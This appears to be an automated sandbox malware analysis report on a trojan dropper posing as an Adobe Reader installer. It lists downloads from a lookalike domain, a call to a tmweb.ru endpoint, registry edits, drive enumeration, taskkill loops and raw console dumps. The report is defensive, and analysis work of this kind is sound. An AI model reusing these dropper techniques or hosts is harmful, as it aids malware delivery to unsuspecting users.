Analysis Report CDaNsQ7Rrd.exe

Overview

General Information

Joe Sandbox Version:	23.0.0
Analysis ID:	74763
Start date:	30.08.2018
Start time:	10:30:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 16s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	CDaNsQ7Rrd.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	401
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal40.troj.evad.winEXE@2202/150@5/2
Cookbook Comments:	Adjust boot time Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, VSSVC.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtWriteVirtualMemory calls found.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	40	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe

virustotal: Detection: 8%

Perma Link

Spreading:

Checks for available system drives (often done to infect USB drives)

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: z:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: x:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: v:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: t:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: r:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: p:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: n:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: l:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: j:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: h:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: f:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: b:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: y:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: w:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: u:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: s:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: q:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: o:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: m:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: k:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: i:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: g:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: e:
Source: C:\Windows\System32\cmd.exe	File opened: c:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File opened: a:

Enumerates the file system

Show sources

Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Networking:

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Aug 2018 08:31:39 GMTContent-Type: application/x-msdownloadContent-Length: 13509120Connection: keep-aliveSet-Cookie: __cfduid=d6220ea83677096d27ca5dc8f5806feef1535617898; expires=Fri, 30-Aug-19 08:31:38 GMT; path=/; domain=.adobemacromedia.com; HttpOnlyLast-Modified: Tue, 10 Apr 2018 20:55:20 GMTAccept-Ranges: bytesServer: cloudflareCF-RAY: 4525e6fca7103e9e-ZRHData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

HTTP traffic detected: GET /f.php?data=000-000-000-000&id_k=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ca80628.tmweb.ru

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /setup.exe HTTP/1.1Accept: /User-Agent: AdvancedInstallerHost: adobemacromedia.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.php?data=000-000-000-000&id_k=1 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ca80628.tmweb.ru

Found strings which match to known social media urls

Show sources

Source: CDaNsQ7Rrd.exe	String found in binary or memory: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s'RichEdit20W[1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmptmpALLUSERS = 1';WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSW
Source: CDaNsQ7Rrd.exe	String found in binary or memory: [H%[H6[H.partHEADhttp://www.google.comhttp://www.yahoo.comhttp://www.example.comtin9999.tmpAdvancedInstallerGETwininet.dllFTP Server/HTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: adobemacromedia.com

Urls found in memory or binary data

Show sources

Source: armstatus.exe.25.dr	String found in binary or memory: http://ca80628.tmweb.ru
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: CDaNsQ7Rrd.exe	String found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: CDaNsQ7Rrd.exe	String found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
Source: armstatus.exe.25.dr	String found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: CDaNsQ7Rrd.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://s2.symcb.com0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://sv.symcd.com0&
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: CDaNsQ7Rrd.exe	String found in binary or memory: http://www.advancedinstaller.com0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: host6.8_unsigned.msi.26.dr	String found in binary or memory: https://www.digicert.com/CPS0

DDoS:

Too many similar processes found

Show sources

Source: tasklist.exe	Process created: 85
Source: timeout.exe	Process created: 94
Source: find.exe	Process created: 87
Source: unknown	Process created: 741
Source: taskkill.exe	Process created: 1041

System Summary:

Uses regedit.exe to modify the Windows registry

Show sources

Source: unknown

Process created: C:\Windows\regedit.exe regedit /s 'C:\inst_fold\armfix.reg'

Creates files inside the system directory

Show sources

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Tasks\{DE4C87A4-56DF-40F2-BF3B-9314F5F8610B}.job

Jump to behavior

Creates mutexes

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe

Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$b60

Deletes files inside the Windows folder

Show sources

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Tasks\{DE4C87A4-56DF-40F2-BF3B-9314F5F8610B}.job

Enables security privileges

Show sources

Source: C:\Windows\System32\msiexec.exe

Process token adjusted: Security

PE file contains strange resources

Show sources

Source: CDaNsQ7Rrd.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CDaNsQ7Rrd.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CDaNsQ7Rrd.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CDaNsQ7Rrd.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.part.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.part.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7za.dll.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7za.dll.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fp.exe.23.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fp.exe.23.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\cscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cscript.exe	File read: C:\Windows\System32\drivers\etc\hosts

Sample file is different than original file name gathered from version info

Show sources

Source: CDaNsQ7Rrd.exe	Binary or memory string: OriginalFileNamereaderupd_en_xa_cra_install.exe: vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exe	Binary or memory string: OriginalFilenamePrereq.dllF vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exe	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exe	Binary or memory string: OriginalFileNameaipackagechainer.exe vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exe	Binary or memory string: OriginalFilenameAICustAct.dllF vs CDaNsQ7Rrd.exe

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

File read: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

Jump to behavior

Uses reg.exe to modify the Windows registry

Show sources

Source: unknown

Process created: C:\Windows\System32\reg.exe reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E945283B-758C-4A40-B851-1066D0E49EA8} /f

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Show sources

Source: CDaNsQ7Rrd.exe

Binary string: IDYESAI_OFFICE_REGOPENAI_ADDIN0.0.0.0Advanced Installer PathSoftware\Caphyon\Advanced Installer\Installation PathSoftware\Caphyon\Advanced InstallerAI_OFN_FILEPATHAI_OFN_DLG_TITLEAI_OFN_FILTERSAI_OFN_FLAGSAI_OFN_DEF_EXTAI_OFN_DIRECTORYAI_OFN_FILENAMEAI_MINJREVERSIONAI_PACKAGE_TYPEx64Intel64Software\JavaSoft\Java Runtime Environment\AI_JREVERFOUNDAI_MINJDKVERSIONSoftware\JavaSoft\Java Development Kit\AI_JDKVERFOUNDAI_COMBOBOX_DATAAI_LISTBOX_DATA\\\esc1\#\esc2\|\esc3\\esc0\esc0\\esc2#\esc3|\esc1\ERROR%sERROR_NO_VALUEERROR_DUPLICATE_ITEM%s: %sSUCCESS#\#|\|\\\%s%c%s%c%s%s%c%sSELECT * FROM `Control` WHERE `Type` = 'Bitmap'AI_SYSTEM_DPIAI_SYSTEM_DPI_SCALEAI_BITMAP_DISPLAY_MODESELECT `Argument`, `Condition` FROM `ControlEvent` WHERE `Dialog_` = 'ExitDialog' AND `Control_` = 'Finish' AND `Event` = 'DoAction' ORDER BY `Ordering`AI_AI_ViewReadmeAI_LaunchAppCTRLS3ALLSELECT `Feature` FROM `Feature`DoActionAddLocalRemoveAddSourceReinstallModeREINSTALLMODEAI_INSTALL_MODE{ED4824AF-DCE4-45A8-81E2-FC7965083634}PublicDocumentsF

Classification label

Show sources

Source: classification engine

Classification label: mal40.troj.evad.winEXE@2202/150@5/2

Creates files inside the user directory

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

File created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1

Jump to behavior

Creates temporary files

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9546.tmp

Jump to behavior

Executes batch files

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\waitbefore.bat' '

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........@..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.............................Ow@..J..!.............d...........,.....dw....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...\|... ........A..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .c.n.t.p.r.o.c.=.0. .......................................<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........A............................S.......S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......%A..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.............................Ow@..J.t".............d...........,.....dw....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.l.i.s.t.....1A..........................@..J8....).J........8...;.dw...............J....H...
Source: C:\Windows\System32\cmd.exe	Console Write: .................... . .....\|... .......7A..................................@..J8....).J....B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .\|. ...\|... .......=A..........................l.....S.......S..........1.Q.............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................f.i.n.d.\|... .......CA..............................................l.....S....................Q....
Source: C:\Windows\System32\cmd.exe	Console Write: .................... ./.I. ./.C. .".7.z.a.a...e.x.e.". . ...................................B1.Ql.......&....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................1.>.....\|... .......OA..........................x.e.". . ...............~1.QX............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.m.p.f.l...t.x.t. .UA..........................". . ...............~1.Qr1.Q\............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......[A.............................w...w....@F.J.........1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........J..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>...............................@..J......Ow@..J.t".............,.....dw....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...\|... ........J...........................`$.<..J.....bNw..\ut.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... ./.p. .p.n.u.m.=. ..J...................................`$.<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................0.<.....\|... ........J...................................................1.Q.............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.m.p.f.l...t.x.t. ..J...............................................1.Q"1.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........J..............................@F.J........UF.J.j.Q.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........J..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.............................Ow@..JF.#.............d...........,.....dw....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...\|... ........K...........................`$.<..J.....bNw..\ut.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... ./.a. .c.n.t.p.r.o.c.=.c.n.t.p.r.o.c.+.0. ..............`$.<..J.....bNw21.Q........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........K............................S.,.....S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......#K..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.l.i.s.t...../K..........................@..J8....).J........8...;.dw...............J....p`$.
Source: C:\Windows\System32\cmd.exe	Console Write: .................... . .....\|... .......5K..................................@..J8....).J....B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .\|. ...\|... .......;K..........................l.....S.......S..........1.Q.............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................f.i.n.d.\|... .......AK..............................................l.....S....................Q....
Source: C:\Windows\System32\cmd.exe	Console Write: .................... ./.I. ./.C. .".a.r.m.s.t.a.l.l...e.x.e.". . ...........................B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................1.>.....\|... .......MK..........................l.l...e.x.e.". . .......~1.QX............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.m.p.f.l...t.x.t. .SK............................e.x.e.". . .......~1.Qr1.Q\............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......YK.............................w...w....@F.J.........1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........S..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>...............................@..J......Ow@..JF.#.............,.....dw....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...\|... ........S...........................`$.<..J.....bNw..\u\|.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... ./.p. .p.n.u.m.=. ..S...................................`$.<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................0.<.....\|... ........S...................................................1.Q.............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.m.p.f.l...t.x.t. ..S...............................................1.Q"1.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........S..............................@F.J........UF.J.j.Q.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........T..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...\|... .......*T...........................`$.<..J.....bNw..\u\|.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......6T............................S.,.....S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......ET..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.l.i.s.t.....QT..........................@..J8....).J........8...;.dw...............J....p`$.
Source: C:\Windows\System32\cmd.exe	Console Write: .................... . .....\|... .......WT..................................@..J8....).J....B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .\|. ...\|... .......]T..........................l.....S.......S..........1.Q.............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................f.i.n.d.\|... .......cT..............................................l.....S....................Q....
Source: C:\Windows\System32\cmd.exe	Console Write: .................... ./.I. ./.C. .".r.u.t.s.e.r.v...e.x.e.". . .............................B1.Ql.......,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................1.>.....\|... .......oT..........................v...e.x.e.". . .........~1.QX............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.m.p.f.l...t.x.t. .uT..........................e.x.e.". . .........~1.Qr1.Q\............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......{T.............................w...w....@F.J.........1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........[..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...\|... ........[...........................`$.<..J.....bNw..\u..............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... ./.p. .p.n.u.m.=. ..\...................................`$.<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................0.<.....\|... ........\...................................................1.Q.............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.m.p.f.l...t.x.t. ..\...............................................1.Q"1.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........\..............................@F.J........UF.J.j.Q.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......A\..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...\|... .......M\...........................`$.<..J.....bNw..\u..............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......Y\............................S.,.....S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... .......h\..........................e.f.o.r.e...........XX%..,.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...\|... .......t\...........................@..............`....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ..................../.I. ...\|... .......z\......................................`....bNw21.Q61.Q.............<.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................".0.". .N.E.Q. .".0.". .........................\|... .......z\..........^1.Qx...........`I.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.a.u.s.e... ........\..................................^1.Qx.....S.......S.....................YF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ............................\|... ........\..........................@j.Q....B........j.Q.....1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......1f..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.......................X.....Ow@..J..................................dw\|...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....=f..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......Cf......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......If..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........g..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.......................X.....Ow@..J..................................dw\|...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........g.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........g...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........g............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........g..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.......................b.a.t................:.I......I...............dw\|...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......g..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........g......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........g..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........i..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........i.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........i...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d......."i............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......1i..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....=i..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......Ci......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......Ii..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......*k..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......6k.......................................bNw..\u\.............................nw
